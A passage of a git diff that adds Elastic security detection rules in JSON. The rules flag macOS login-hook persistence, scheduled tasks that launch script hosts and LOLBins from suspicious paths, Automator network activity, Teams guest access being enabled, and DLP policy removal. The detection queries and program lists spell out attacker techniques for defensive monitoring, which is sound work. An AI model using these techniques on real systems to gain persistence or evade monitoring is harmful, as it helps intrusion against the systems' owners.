00000000000..0bdc3d4cba8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json 
@@ -0,0 +1,81 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Defaults command to install a login or logoff hook in MacOS. An adversary may abuse this capability to establish persistence in an environment by inserting code to be executed at login or logout.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Login or Logout Hook", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and\n process.name == \"defaults\" and process.args == \"write\" and process.args : (\"LoginHook\", \"LogoutHook\") and\n not process.args :\n (\n \"Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"Support/JAMF/ManagementFrameworkScripts/loginhook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/loginhook.sh\"\n )\n", + "references": [ + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2014/Wardle-VB2014.pdf", + "https://www.manpagez.com/man/1/defaults/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json new file mode 100644 index 00000000000..1c0e1c17943 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107.json 
@@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.", + "false_positives": [ + "Legitimate scheduled tasks running third party software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Scheduled Task", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\*.bat\" and process.working_directory : \"?:\\\\Windows\\\\System32\\\\\") and\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\Windows\\\\system32\\\\calluxxprovider.vbs\") and\n not (process.name : \"powershell.exe\" and process.args : (\"-File\", \"-PSConsoleFile\") and user.id : \"S-1-5-18\") and\n not (process.name : \"msiexec.exe\" and user.id : \"S-1-5-18\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": 
"^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json new file mode 100644 index 00000000000..9c35355a0c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108.json 
@@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.", + "false_positives": [ + "Legitimate scheduled tasks running third party software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Scheduled Task", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* Schedule service cmdline on Win10+ */\n process.parent.name : \"svchost.exe\" and process.parent.args : \"Schedule\" and\n /* add suspicious programs here */\n process.pe.original_file_name in\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) and\n /* add suspicious paths here */\n process.args : (\n \"C:\\\\Users\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"C:\\\\Windows\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\Windows\\\\Debug\\\\*\",\n \"C:\\\\HP\\\\*\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\*.bat\" and process.working_directory : \"?:\\\\Windows\\\\System32\\\\\") and\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\Windows\\\\system32\\\\calluxxprovider.vbs\") and\n not (process.name : \"powershell.exe\" and process.args : (\"-File\", \"-PSConsoleFile\") and user.id : \"S-1-5-18\") and\n not (process.name : \"msiexec.exe\" and user.id : \"S-1-5-18\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + 
"version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + 
"id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json new file mode 100644 index 00000000000..efdc02f4a80 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_106.json 
@@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the Automator Workflows process followed by a network connection from it's XPC service. Adversaries may drop a custom workflow template that hosts malicious JavaScript for Automation (JXA) code as an alternative to using osascript.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Automator Workflows Execution", + "query": "sequence by host.id with maxspan=30s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"automator\"]\n [network where host.os.type == \"macos\" and process.name:\"com.apple.automator.runner\"]\n", + "references": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "5d9f8cfc-0d03-443e-a167-2b0597ce0965_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json new file mode 100644 index 00000000000..86b2e7fbd17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_103.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json new file mode 100644 index 00000000000..b1b257f4c34 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_105.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json new file mode 100644 index 00000000000..df045960277 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_206.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment.", + "false_positives": [ + "Teams guest access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams Guest Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: 
Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "5e552599-ddec-4e14-bad1-28aa42404388_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json new file mode 100644 index 00000000000..5055889f5c4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + 
"reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json new file mode 100644 index 00000000000..a91be9bc705 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + 
